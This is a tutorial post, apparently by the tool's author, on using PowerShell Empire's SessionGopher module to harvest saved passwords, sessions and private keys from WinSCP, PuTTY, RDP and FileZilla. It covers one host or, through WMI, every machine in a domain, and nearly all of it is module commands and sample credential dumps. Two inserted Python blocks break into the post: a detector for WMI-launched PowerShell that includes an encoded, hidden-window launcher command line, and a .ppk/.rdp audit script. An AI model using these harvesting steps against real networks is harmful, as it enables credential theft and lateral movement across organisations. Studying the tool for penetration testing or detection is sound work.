New in PowerShell Empire 2.0: SessionGopher

By Brandon Arvanaghi @arvanaghi

SessionGopher is now part of PowerShell Empire 2.0. Here’s how to use the module.

Some background: SessionGopher is a PowerShell tool that extracts saved sessions and passwords from WinSCP, RDP, FileZilla, PuTTY and SuperPuTTY, as well as from .rdp, .ppk and .sdtid files. It automatically deobfuscates and finds passwords for these tools where applicable, and helps you find Unix systems and jump boxes.

Once you have your agent, all that's left to do is run

(Empire: [agent]) > usemodule credentials/sessiongopher
(Empire: powershell/credentials/sessiongopher) > run

          o_       
         /  ".   SessionGopher
       ,"  _-"      
     ,"   m m         
  ..+     )      Brandon Arvanaghi
     `m..m       Twitter: @arvanaghi | arvanaghi.com

WinSCP Sessions

Source   : WIN7-BARVANAGHI\ProfessorX
Session  : adm-angela@192.168.43.21
Hostname : 192.168.43.21
Username : adm-angela
Password : dw!ghtB33ts

FileZilla Sessions

Source   : WIN7-BARVANAGHI\ProfessorX
Name     : Affiliate Jump Box
Password : d3ad0nb4lls@ccurat3
Host     : 198.143.22.9
User     : MonaLisaVito
Protocol : Use SFTP
Port     : 22

Microsoft Remote Desktop (RDP) Sessions

Source   : WIN7-BARVANAGHI\ProfessorX
Hostname : dc01
Username : CORP\ProfessorX

Source   : WIN7-BARVANAGHI\ProfessorX
Hostname : exchange001
Username : CORP\ProfessorX

PuTTY Sessions

Source   : WIN7-BARVANAGHI\ProfessorX
Session  : Point of Sale Device
Hostname : 10.25.84.31

SuperPuTTY Sessions

Source        : WIN7-BARVANAGHI\DrOctopus
SessionId     : Design Computer
SessionName   : Design Computer
Host          : 192.168.20.166
Username      : root
ExtraArgs     : -pw kleen3x41
Port          : 22
Putty Session : Default Settings

Running as admin allows SessionGopher to extract sessions for every single domain user who has ever logged on to that host. This is done by querying the HKEY_USERS hive, which contains subkeys for all users who have ever had interactive sessions on that host. These subkeys store saved session information for these tools regardless of whether the user is logged in, and while admin accounts can access every subkey on the system, non-privileged accounts can only access their own.

Query remote hosts using WMI

To run SessionGopher against remote hosts from your agent, use one of the Target, AllDomain, or iL arguments. All three use WMI to query the remote hosts in question, so they run quietly. Note that all three of these arguments require admin privileges on the remote hosts they query.

AllDomain (switch)

This is where the magic happens. AllDomain runs SessionGopher across every computer in the domain, effectively providing a mapping of the entire domain for you through saved sessions. Beyond credentials, the output of AllDomain should yield the locations of jump boxes and Unix systems in the environment.

(Empire: powershell/credentials/sessiongopher) > set AllDomain True
(Empire: powershell/credentials/sessiongopher) > run

[+] Digging on DC02...

Microsoft RDP Sessions

Source   : DC02\Professorx
Hostname : dc01
Username : CORP\ProfessorX

[+] Digging on WEB01...
[+] Digging on MAIL01...
[+] Digging on WIN7-CLIENT03...

WinSCP Sessions

Source   : WIN7-CLIENT03\JimmyMcGill
Session  : saulgoodman@192.168.14.80
Hostname : 192.168.14.80
Username : saulgoodman
Password : gravit4s

Microsoft RDP Sessions

Source   : WIN7-CLIENT03\JimmyMcGill
Hostname : 10.20.30.35
Username : CORP\Saul.Goodman

PuTTY Sessions

Source   : WIN7-CLIENT03\MikeEhrmantraut
Session  : Cash_Register
Hostname : 10.14.21.90

... etc ...

Target

Target runs SessionGopher against a specific remote host you provide.

(Empire: powershell/credentials/sessiongopher) > set Target WIN7-CLIENT01.corp.com
(Empire: powershell/credentials/sessiongopher) > run

... output ...

iL

To run against a specific set of hosts, provide the path to a .txt file on the beaconing host that contains hostnames, one per line.

(Empire: powershell/credentials/sessiongopher) > set iL C:\Users\Professor X\Tmp\hosts.txt
(Empire: powershell/credentials/sessiongopher) > run

... output ...
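All three remote modes above (Target, iL and AllDomain) reach the queried hosts over WMI, which is also what a defender can watch for. The following is an added example and not part of SessionGopher or Empire: a small Python detector run over constructed Sysmon-style process-creation records (flattened to key=value text, an assumed layout) that flags PowerShell started under the WMI provider host WmiPrvSE.exe, the parent that WMI-created processes get, and adds a second reason when the command line looks like an encoded or hidden launcher. The host names, users, records and the base64 fragment are constructed for the demo.

```python
"""Spot remote WMI-launched PowerShell in process-creation telemetry (added example)."""
import re
from dataclasses import dataclass
from typing import Iterable, List

# Assumed record layout: Sysmon Event ID 1 fields flattened to "Key=value" pairs.
FIELDS = ("Computer", "User", "ParentImage", "Image", "CommandLine")
FIELD_SPLIT = re.compile(r"\s+(?=(?:%s)=)" % "|".join(FIELDS))

# Processes created through WMI (Win32_Process) are children of the provider host.
WMI_HOST = "wmiprvse.exe"
SHELLS = {"powershell.exe", "pwsh.exe"}
# Encoded, profile-less or hidden-window launches are how PowerShell agents are usually staged.
STAGER_ARGS = re.compile(
    r"-(?:enc|encodedcommand|e)\s|-(?:nop|noprofile)\b|-w(?:indowstyle)?\s+(?:hidden|1)\b",
    re.I)


@dataclass(frozen=True)
class ProcessEvent:
    computer: str
    user: str
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    computer: str
    user: str
    reason: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one flattened 'Key=value Key=value ...' record into a ProcessEvent."""
    fields = {}
    for chunk in FIELD_SPLIT.split(line.strip()):
        key, _, value = chunk.partition("=")   # values (command lines) may contain '='
        fields[key] = value
    missing = [f for f in FIELDS if f not in fields]
    if missing:
        raise ValueError("record is missing fields: %s" % ", ".join(missing))
    return ProcessEvent(fields["Computer"], fields["User"], fields["ParentImage"],
                        fields["Image"], fields["CommandLine"])


def image_name(path: str) -> str:
    """Lower-cased file name of a full Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> List[str]:
    """Return the reasons this event is suspicious (empty list if it is not)."""
    reasons: List[str] = []
    if image_name(ev.parent_image) == WMI_HOST and image_name(ev.image) in SHELLS:
        reasons.append("PowerShell spawned by WmiPrvSE.exe (remote WMI execution)")
        if STAGER_ARGS.search(ev.command_line):
            reasons.append("encoded, profile-less or hidden-window command line")
    return reasons


def detect(lines: Iterable[str]) -> List[Finding]:
    return [Finding(ev.computer, ev.user, r)
            for ev in map(parse_event, lines) for r in classify(ev)]


# Constructed sample records (not real telemetry).
SAMPLE_RECORDS = [
    # 1) WMI-launched, encoded PowerShell: the footprint of a remote module run
    "Computer=WEB01 User=CORP\\svc_admin "
    "ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAcwBpAG8AbgA=",
    # 2) interactive PowerShell started from Explorer: benign
    "Computer=WEB01 User=CORP\\alice "
    "ParentImage=C:\\Windows\\explorer.exe "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -File C:\\scripts\\backup.ps1",
    # 3) WMI-launched but not a shell: outside this rule
    "Computer=DC02 User=NT AUTHORITY\\SYSTEM "
    "ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe "
    "Image=C:\\Windows\\System32\\wbem\\WMIC.exe "
    "CommandLine=wmic os get caption",
    # 4) WMI-launched plain PowerShell (e.g. a management agent): one reason only
    "Computer=DC02 User=CORP\\svc_mgmt "
    "ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -File C:\\ops\\inventory.ps1",
]


def run_sample() -> List[Finding]:
    return detect(SAMPLE_RECORDS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.computer:<8} {f.user:<20} {f.reason}")
```

Record 4 shows why the parent/child pair alone is a lead rather than a verdict: management agents also create PowerShell through WMI, so the rule keeps that as a single low-weight reason and reserves the second reason for launcher-style command lines.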

Additional arguments

Thorough (switch)

Use Thorough in combination with any other set of arguments to search the entire filesystem for .rdp, .ppk, and .sdtid files. Since it searches the entire filesystem, it is not recommended that you use Thorough when querying more than a few hosts at a time. With Thorough, the output automatically parses .ppk and .rdp files and extracts the relevant session details and private key, like so:

(Empire: powershell/credentials/sessiongopher) > set Thorough True
(Empire: powershell/credentials/sessiongopher) > run

PuTTY Private Key Files (.ppk)

Path                   : C:\Users\Brandon Arvanaghi\Documents\mykey.ppk
Protocol               : ssh-rsa
Comment                : rsa-key-20170116
Private Key Encryption : none
Private Key            : {AAABAEazxtDz6E9mDeONOmz07sG/n1eS1pjKI8fOCuuLnQC58LeCTlysOmZ1/iC4, g4HyRpmdKJGhIxj66/	RQ135hVesyk02StleepK4+Tnvz3zmdr4Do5W99qKkrWI3D, T9GOxOIoR9Zc6j57D+fdesJq4ItEIxcQZlXC1F9KZcbXjSJ3iBmCsbG/aRJmMJNx, 
                         nCMaZkySr4R4Z/E+l1JOzXaHh5WQ2P0K4YM1/6XG6C4VzDjvXwcY67MYsobTeCR2...}
Private MAC            : b7e47819fee39a95eb374a97f939c3c868f880de


Microsoft Remote Desktop .rdp Files

Path                    : C:\Users\Brandon Arvanaghi\Desktop\config\PenTestLab-Win.RDP
Hostname                : dc01.corp.hackerplaypen.com
Gateway                 : rds01.corp.hackerplaypen.com
Prompts for Credentials : No
Administrative Session  : Does not connect to admin session on remote host

... output ...
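Thorough parses .ppk and .rdp files found on disk; the same two file formats can be audited from the defender's side to find keys stored without a passphrase and RDP shortcuts that connect without prompting. The following Python parser is an added example, not SessionGopher's own code: it reads the PPK header (the PuTTY-User-Key-File-N, Encryption, Comment and Private-MAC lines, skipping the Public-Lines and Private-Lines base64 blocks) and the .rdp "name:type:value" settings file, and unlike the module output above it deliberately never returns the private key material. The sample files, their base64 lines and the MAC value are constructed placeholders; parse_ppk, parse_rdp and audit are names chosen here.

```python
"""Audit PuTTY .ppk and Microsoft .rdp files for stored secrets (added example)."""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class PpkReport:
    path: str
    protocol: str              # e.g. ssh-rsa, from the PuTTY-User-Key-File-N header
    comment: str
    encryption: str            # "none" means no passphrase protects the private key
    private_lines: int         # size of the private block; the block itself is not kept
    private_mac: Optional[str]

    @property
    def unprotected(self) -> bool:
        return self.encryption.lower() == "none"


def parse_ppk(path: str, text: str) -> PpkReport:
    """Parse the headers of a PPK file, stepping over the base64 key blocks."""
    lines = text.splitlines()
    if not lines or not lines[0].startswith("PuTTY-User-Key-File-"):
        raise ValueError(f"{path}: not a PuTTY private key file")
    headers: Dict[str, str] = {}
    counts = {"Public-Lines": 0, "Private-Lines": 0}
    i = 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if not line.strip():
            continue
        key, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"{path}: malformed header at line {i}")
        key, value = key.strip(), value.strip()
        if key in counts:
            # A count header is followed by that many base64 lines; skip them
            # instead of collecting key material into an audit report.
            counts[key] = int(value)
            i += counts[key]
        else:
            headers[key] = value
    version_key = next(k for k in headers if k.startswith("PuTTY-User-Key-File-"))
    return PpkReport(path, headers[version_key], headers.get("Comment", ""),
                     headers.get("Encryption", "unknown"), counts["Private-Lines"],
                     headers.get("Private-MAC"))


@dataclass
class RdpReport:
    path: str
    hostname: str
    gateway: Optional[str]
    username: Optional[str]
    prompts_for_credentials: bool
    administrative_session: bool


def parse_rdp(path: str, text: str) -> RdpReport:
    """Parse an .rdp settings file: one 'name:type:value' per line (type s, i or b)."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":", 2)
        if len(parts) != 3:
            raise ValueError(f"{path}: malformed setting {line!r}")
        settings[parts[0].lower()] = parts[2]
    # Integer settings that are absent count as 0: no prompt, no admin session.
    return RdpReport(path, settings.get("full address", ""),
                     settings.get("gatewayhostname") or None,
                     settings.get("username") or None,
                     settings.get("prompt for credentials", "0") == "1",
                     settings.get("administrative session", "0") == "1")


def audit(files: Dict[str, str]) -> List[str]:
    """One warning per file that stores something worth cleaning up."""
    warnings: List[str] = []
    for path, text in files.items():
        if path.lower().endswith(".ppk"):
            k = parse_ppk(path, text)
            if k.unprotected:
                warnings.append(f"{path}: {k.protocol} private key stored without a passphrase")
        elif path.lower().endswith(".rdp"):
            r = parse_rdp(path, text)
            if not r.prompts_for_credentials:
                via = f" via {r.gateway}" if r.gateway else ""
                who = f" as {r.username}" if r.username else ""
                warnings.append(f"{path}: connects to {r.hostname}{via}{who} without prompting")
    return warnings


# Constructed sample files: the base64 lines and MAC are placeholders, not a real key.
SAMPLE_PPK = """PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20170116
Public-Lines: 1
AAAAB3NzaC1yc2EAAAABJQAAAQEAPLACEHOLDER
Private-Lines: 1
AAAAgQPLACEHOLDER
Private-MAC: 0000000000000000000000000000000000000000
"""
SAMPLE_RDP = """full address:s:dc01.corp.hackerplaypen.com
gatewayhostname:s:rds01.corp.hackerplaypen.com
prompt for credentials:i:0
administrative session:i:0
username:s:CORP\\ProfessorX
"""
```

A run of `audit({"mykey.ppk": SAMPLE_PPK, "PenTestLab-Win.RDP": SAMPLE_RDP})` produces the two warnings a cleanup ticket would need: the key file needs a passphrase, and the RDP shortcut should be set to prompt.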

u and p

To run under a different user account than the one the beaconing agent runs as, specify a username and password.

(Empire: powershell/credentials/sessiongopher) > set u CORP\Bruce.Wayne
(Empire: powershell/credentials/sessiongopher) > set p ImB@tm@n43~
(Empire: powershell/credentials/sessiongopher) > run

... output ...

To see all these options together, enter options.

(Empire: powershell/credentials/sessiongopher) > options

  Name      Required    Value       Description
  ----      --------    -------     -----------
  p         False                   Password for user account (if -u        
                                    argument provided).                     
  u         False                   User account (e.g. corp.com\jerry) for  
                                    when using -Target, -iL, or -AllDomain. 
                                    If not provided, uses current security  
                                    context.                                
  Thorough  False                   Switch. Searches entire filesystem for  
                                    .ppk, .rdp, .sdtid files. Not           
                                    recommended to use with -AllDomain due  
                                    to time.                                
  o         False                   Switch. Drops a folder of all output in 
                                    .csvs on remote host.                   
  AllDomain False                   Switch. Run against all computers on    
                                    domain. Uses current security context,  
                                    unless -u and -p arguments provided.    
                                    Uses WMI.                               
  iL        False                   Provide path to a .txt file on the      
                                    remote host containing hosts separated  
                                    by newlines to run remotely against.    
                                    Uses WMI.                               
  Agent     True        Z9TU5F4A    Agent to run module on.                 
  Target    False                   Provide a single host to run remotely   
                                    against. Uses WMI.   

I built SessionGopher for simplicity, so you can expect to run it without setting any values and still get interesting output. Again, running as admin is preferred.

Have fun, and let me know how it goes!